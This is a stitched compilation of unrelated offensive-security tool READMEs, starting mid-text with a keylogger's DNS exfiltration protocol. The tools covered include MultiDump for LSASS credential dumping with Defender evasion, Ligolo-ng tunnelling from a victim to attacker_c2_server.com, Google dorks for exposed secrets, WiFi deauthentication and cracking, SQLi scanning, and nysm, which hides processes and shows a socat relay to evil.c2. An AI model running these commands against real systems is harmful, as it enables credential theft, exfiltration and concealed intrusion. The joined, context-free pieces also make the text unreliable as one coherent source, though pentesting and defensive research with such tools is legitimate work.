The server will respond with an IP address in the following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
A record requests starting with b
indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id is the id that was established on connection. Data is sent as ASCII encoded in hex.
code is one of the codes described below.
200: OK. If the client sends a request that is processed normally, the server will respond with code 200.
201: Malformed Record Request. If the client sends a malformed record request, the server will respond with code 201.
202: Non-Existent Connection. If the client sends a data packet with an id greater than the number of connections, the server will respond with code 202.
203: Out of Order Packet. If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0; the client can then resend the packet with the new packet id.
204: Reached Max Connections. If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
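For intuition, the sketch below builds query names in the format described above. It is illustrative only: the helper names and example domain are assumptions, and a real client must also keep each DNS label under 63 characters (which is why the logger batches input).
import binascii

DOMAIN = "example.com"  # the domain the server is authoritative for (assumed)

def connection_query(domain=DOMAIN):
    # Connection requests start with "a"; the server answers 123.123.123.[id]
    return f"a.1.1.1.{domain}."

def data_query(packet_no, client_id, data, domain=DOMAIN):
    # Data requests start with "b"; the payload is ASCII encoded as hex
    hex_data = binascii.hexlify(data.encode("ascii")).decode()
    return f"b.{packet_no}.{client_id}.{hex_data}.{domain}."

print(connection_query())
print(data_query(1, 1, "The quick brown fox."))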
The log file containing user inputs includes ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text editor.
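As an alternative to cat -v, the control characters can be rendered in caret notation with a few lines of Python; this is only a sketch, and the log file path is an assumption (the actual name under /tmp/ depends on how the logger was started).
# Render the keystroke log with ASCII control characters made visible (like cat -v)
with open("/tmp/keylog", "rb") as f:   # hypothetical log file path
    data = f.read()

out = []
for byte in data:
    if byte in (9, 10):                 # keep tabs and newlines as-is
        out.append(chr(byte))
    elif byte < 32 or byte == 127:      # caret notation, e.g. ^H for backspace, ^? for delete
        out.append("^" + chr(byte ^ 0x40))
    else:
        out.append(chr(byte))
print("".join(out))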
The keylogger relies on script, so it won't run in non-interactive shells.
For some reason, the Windows Dns_Query_A call always sends duplicate requests. The server handles this fine because it discards repeated packets.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dumping via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections for slower network speeds
-v Enable verbose mode
MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS-related tools, Administrator/SeDebugPrivilege privileges are required.
The handler depends on Pypykatz to parse the LSASS dump and impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, the Pypykatz version is likely outdated.
By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip
option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r
.
An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
Self deletion can be toggled by uncommenting the following line in Common.h
:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h
:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of). The investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
Download the Jython standalone JAR, jython-standalone-2.7.3.jar.
Make sure pip is available in the Jython environment: java -jar jython-standalone-2.7.3.jar -m ensurepip.
Download GAP.py and requirements.txt from this project and place them in the same directory.
Install the requirements: java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
.Or you can right click a request or response in any other context and select GAP from the Extensions menu.
If you don't need one of the modes, un-check it; results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.
If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl key and click the GAP logo header image to remove it and make more space.
The Words mode uses the beautifulsoup4
library and this can be quite slow, so be patient!
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
Tentative Issues, e.g. parameters that were found in the Response (but not as query parameters in links found).
A replacement for beautifulsoup4 that is faster at parsing responses for Words.
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
/XNL-h4ck3r
mapXplore is a modular application that imports data extracted by sqlmap into a PostgreSQL or SQLite database.
Its main features are:
Automatic export of information stored in base64, such as:
Filter tables and columns by criteria.
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements
It is a modular application, and consists of the following:
Allows loading a default configuration at the start of the program
python engine.py [--config config.json]
A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
site:example.com -www -shop -share -ir -mfa
site:example.com ext:php inurl:?
site:openbugbounty.org inurl:reports intext:"example.com"
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com
inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com
inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com
inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"
site:pastebin.com "example.com"
site:jsfiddle.net "example.com"
site:codebeautify.org "example.com"
site:codepen.io "example.com"
site:s3.amazonaws.com "example.com"
site:blob.core.windows.net "example.com"
site:googleapis.com "example.com"
site:drive.google.com "example.com"
site:dev.azure.com "example[.]com"
site:onedrive.live.com "example[.]com"
site:digitaloceanspaces.com "example[.]com"
site:sharepoint.com "example[.]com"
site:s3-external-1.amazonaws.com "example[.]com"
site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"
site:dropbox.com/s "example[.]com"
site:box.com/s "example[.]com"
site:docs.google.com inurl:"/d/" "example[.]com"
site:jfrog.io "example[.]com"
site:firebaseio.com "example[.]com"
site:example.com "choose file"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
site:*/security.txt "bounty"
site:*/server-status apache
inurl:/wp-admin/admin-ajax.php
intext:"Powered by" & intext:Drupal & inurl:user
site:*/joomla/login
Medium articles for more dorks:
https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906
https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d
https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12
Top Parameters:
https://github.com/lutfumertceylan/top25-parameter
Proviesec dorks:
https://github.com/Proviesec/google-dorks
GTFOcli is a command-line interface for easily searching for binaries that can be used to bypass local security restrictions in misconfigured systems.
Using go
:
go install github.com/cmd-tools/gtfocli@latest
Using homebrew
:
brew tap cmd-tools/homebrew-tap
brew install gtfocli
Using docker
:
docker pull cmdtoolsowner/gtfocli
Search for binary tar
:
gtfocli search tar
Search for binary tar
from stdin
:
echo "tar" | gtfocli search
Search for binaries listed in a file:
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
gtfocli search -f myBinaryList.txt
Search for binary Winget.exe
:
gtfocli search Winget --os windows
Search for binary Winget
from stdin
:
echo "Winget" | gtfocli search --os windows
Search for binaries listed in a file:
cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe
gtfocli search -f windowsExecutableList.txt --os windows
Search for binary Winget
and print output in yaml
format (see -h
for available formats):
gtfocli search Winget -o yaml --os windows
Examples:
Search for binary Winget
and print output in yaml
format:
docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows
Search for binary tar
and print output in json
format:
echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json
Search for binaries listed in a file mounted as a volume in the container:
cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail
docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt
A common use case for gtfocli is to combine it with find:
find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null
or
find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search
Thanks to GTFOBins and LOLBAS; without these projects, gtfocli would never have come to light.
You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.
The summary of the changelog since the 2023.4 release from December is:
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
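As a rough illustration of that approach (these are generic example patterns, not SwaggerSpy's actual rule set, and the filename is an assumption), a locally saved Swagger/OpenAPI document could be scanned like this:
import json
import re

# Illustrative secret-hunting patterns only
PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Bearer token": re.compile(r"(?i)bearer\s+[a-z0-9._\-]{20,}"),
    "Generic API key": re.compile(r"(?i)api[_-]?key['\"]?\s*[:=]\s*['\"][a-z0-9_\-]{16,}['\"]"),
}

with open("swagger.json") as f:       # a locally saved API document (assumed filename)
    text = json.dumps(json.load(f))   # flatten the document into one searchable string

for name, pattern in PATTERNS.items():
    for match in pattern.finditer(text):
        print(f"[{name}] {match.group(0)}")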
To use SwaggerSpy, follow these steps:
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
python swaggerspy.py searchterm
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
Special thanks to @Liodeus for providing project inspiration through swaggerHole.
navgix is a multi-threaded Go tool that checks for nginx alias traversal vulnerabilities.
Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):
navgix will make an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes of HTML elements), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
navgix will also test a short list of directories that commonly have this vulnerability; if any of them exist, it will attempt to confirm whether a vulnerability is present.
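A simplified sketch of the first technique, in Python rather than navgix's Go implementation, is shown below; the target URL, asset path and the off-by-slash probe are assumptions for illustration, and a real check would compare responses more carefully than just looking at status codes.
import requests  # assumed to be available

BASE = "https://target.example"          # hypothetical target
asset = "/static/img/photos/avatar.png"  # e.g. found in an src attribute

# Derive /static/, /static/img/ and /static/img/photos/ from the asset path
parts = asset.strip("/").split("/")[:-1]
candidates = ["/" + "/".join(parts[:i + 1]) + "/" for i in range(len(parts))]

for directory in candidates:
    # Off-by-slash probe (/static../); a positive response hints at an alias misconfiguration
    probe = BASE + directory.rstrip("/") + "../"
    r = requests.get(probe, allow_redirects=False, timeout=5)
    if r.status_code in (200, 403):
        print(f"possible alias traversal at {probe} ({r.status_code})")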
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
See the setup instructions.
See development.md
Post Name | Publication Date | Link |
---|---|---|
Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4 |
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9 |
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6 |
Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] » ifconfig
[...]
┌──────────────────────────────────────────────┐
│ Interface 3                                  │
├────────────────┬─────────────────────────────┤
│ Name           │ wlp3s0                      │
│ Hardware MAC   │ de:ad:be:ef:ca:fe           │
│ MTU            │ 1500                        │
│ Flags          │ up|broadcast|multicast      │
│ IPv4 Address   │ 192.168.0.30/24             │
└────────────────┴─────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] » listener_list
┌────────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                               │
├───┬─────────────────────────┬────────────────────────┬─────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS  │
├───┼─────────────────────────┼────────────────────────┼─────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321          │
└───┴─────────────────────────┴────────────────────────┴─────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
Clone the repository: git clone https://github.com/redhuntlabs/antisquat.
Install the requirements: pip install -r requirements.txt.
Create a file named .openai-key and paste your ChatGPT API key in there.
Create a file named .godaddy-key and paste your GoDaddy API key in there.
Optionally, create a file named blacklist.txt and type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
Run the tool: python3.8 antisquat.py domains.txt
Let's say you'd like to run AntiSquat on "flipkart.com". Create a file named "domains.txt", type in flipkart.com, then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
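For intuition, a few simple typo-permutation classes can be generated as in the sketch below; this is purely illustrative and not AntiSquat's own generator, which also applies NLP/LLM-driven checks on top of the permutations.
def permutations(domain):
    name, tld = domain.rsplit(".", 1)
    results = set()
    for i in range(len(name)):
        # Character omission: flipkart.com -> lipkart.com, fipkart.com, ...
        results.add(name[:i] + name[i + 1:] + "." + tld)
        # Character repetition: flipkart.com -> fflipkart.com, fllipkart.com, ...
        results.add(name[:i + 1] + name[i] + name[i + 1:] + "." + tld)
    for i in range(len(name) - 1):
        # Adjacent character swap: flipkart.com -> lfipkart.com, filpkart.com, ...
        results.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)
    return sorted(results)

print(permutations("flipkart.com")[:10])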
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface
Management platform, check out NVADR.
Airgorah is a WiFi auditing tool that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on the aircrack-ng tool suite.
β Don't forget to put a star if you like the project!
This software only works on Linux and requires root privileges to run. You will also need a wireless network card that supports monitor mode and packet injection.
The installation instructions are available here.
The documentation about the usage of the application is available here.
This project is released under MIT license.
If you have any questions about the usage of the application, do not hesitate to open a discussion.
If you want to report a bug or propose a feature, do not hesitate to open an issue or submit a pull request.
A powerful sensor tool to discover login panels and perform POST-form SQLi scanning.
Features
so the script is super fast at scanning many urls
quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom
Installation
git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh
Dependencies
1. Multiple hosts scanning to detect login panels
python3 logsensor.py -f <subdomains-list>
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login
2. Targeted SQLi form scanning
python logsensor.py -u www.example.com/login --sqli
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email
View help
python logsensor.py --help
usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]
optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit
TODO
A stealth post-exploitation container.
With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:
All these tools go blind to what goes through nysm. It hides:
Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y
cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
cd ./nysm/src/
make
nysm is a simple program to run before the intended command:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
Run a hidden bash:
./nysm bash
Run a hidden ssh and remove ./nysm:
./nysm -r ssh user@domain
Run a hidden socat as a daemon and remove ./nysm:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest-level call interacting with a userspace address, overwrite its value, and hide the desired objects. To differentiate nysm events from the others, everything runs inside a separate PID namespace.
bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list, and bpftool link list. Like any eBPF program, bpftool uses the bpf() system call, more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID, and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed to by the attr argument.
To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.
